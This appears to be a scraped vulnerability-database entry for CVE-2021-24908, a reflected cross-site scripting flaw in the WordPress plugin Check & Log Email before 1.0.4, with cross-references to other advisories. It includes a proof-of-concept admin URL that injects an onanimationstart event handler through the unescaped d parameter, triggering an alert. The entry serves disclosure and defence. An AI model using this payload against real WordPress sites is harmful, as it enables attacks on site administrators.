Lucene search
JrXnmWPEX-ID:77F50129-4B1F-4E50-8321-9DD32DEBA6E1HistoryNov 01, 2021 - 12:00 a.m.
Check & Log Email < 1.0.4 - Reflected Cross-Site Scripting
2021-11-0100:00:00
JrXnm
308
email logging
cross-site scripting
security exploit
wordpress site
EPSS
0.001
Percentile
43.6%
The plugin does not escape the d parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting
With the "Enable Logs" setting activated: https://example.com/wp-admin/admin.php?page=check-email-logs&d="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//Related
cnvd
cnvd
WordPress Plugin Cross-Site Scripting Vulnerability (CNVD-2021-102401)
2021-12-01 00:00:00
prion
prion
Cross site scripting
2021-11-29 09:15:00
cve
cve
CVE-2021-24908
2021-11-29 09:15:07
wpvulndb
wpvulndb
Check & Log Email < 1.0.4 - Reflected Cross-Site Scripting
2021-11-01 00:00:00
cvelist
cvelist
CVE-2021-24908 Check & Log Email < 1.0.4 - Reflected Cross-Site Scripting
2021-11-29 08:25:48
nvd
nvd
CVE-2021-24908
2021-11-29 09:15:07